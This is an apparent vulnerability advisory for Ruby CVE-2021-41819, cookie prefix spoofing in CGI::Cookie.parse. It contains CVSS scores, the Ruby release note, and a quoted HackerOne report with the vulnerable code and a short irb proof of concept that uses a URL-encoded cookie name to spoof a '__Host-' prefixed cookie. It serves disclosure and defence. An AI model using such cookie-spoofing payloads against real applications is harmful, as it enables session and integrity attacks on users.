Ooooooo_qH1:1464396Internet Bug Bounty: Ruby CVE-2021-41819: Cookie Prefix Spoofing in CGI::Cookie.parse
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.002 Low
EPSS
Percentile
56.8%
Release note: https://www.ruby-lang.org/en/news/2021/11/24/cookie-prefix-spoofing-in-cgi-cookie-parse-cve-2021-41819/
> The old versions of CGI::Cookie.parse applied URL decoding to cookie names. An attacker could exploit this vulnerability to spoof security prefixes in cookie names, which may be able to trick a vulnerable application.
> By this fix, CGI::Cookie.parse no longer decodes cookie names. Note that this is an incompatibility if cookie names that you are using include non-alphanumeric characters that are URL-encoded.
> This is the same issue of CVE-2020-8184.
The following is copied from hackeroneās report. https://hackerone.com/reports/910552
I found the same problem with https://hackerone.com/reports/895727 exists at CGI::Cookie.parse.
https://github.com/ruby/ruby/blob/v2_7_1/lib/cgi/cookie.rb#L162
def self.parse(raw_cookie)
cookies = Hash.new([])
return cookies unless raw_cookie
raw_cookie.split(/;\s?/).each do |pairs|
name, values = pairs.split('=',2)
next unless name and values
name = CGI.unescape(name)
values ||= ""
values = values.split('&').collect{|v| CGI.unescape(v,@@accept_charset) }
if cookies.has_key?(name)
values = cookies[name].value + values
end
cookies[name] = Cookie.new(name, *values)
end
cookies
end
The value of name is decoded.
PoC
āÆ ruby -v
ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [x86_64-darwin19]
āÆ irb
irb(main):001:0> require 'cgi'
=> true
irb(main):002:0> cookie_a = CGI::Cookie.parse("__%48ost-evil=evil;__Host-evil=abc")
irb(main):003:0> cookie_a["__Host-evil"]
=> #<CGI::Cookie: "__Host-evil=evil&abc; path=">
irb(main):004:0> cookie_a["__Host-evil"].to_a
=> ["evil", "abc"]
irb(main):005:0> cookie_b = CGI::Cookie.parse("%48oge=evil;Hoge=abc;Foo=xxx")
irb(main):006:0> cookie_b["Hoge"].to_a
=> ["evil", "abc"]
irb(main):007:0> cookie_b["Foo"].to_a
=> ["xxx"]
Impact
It has the same impact as #895727, and it is possible to insert a value into the name of a cookie that should be protected by Cookie prefixes.
Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.002 Low
EPSS
Percentile
56.8%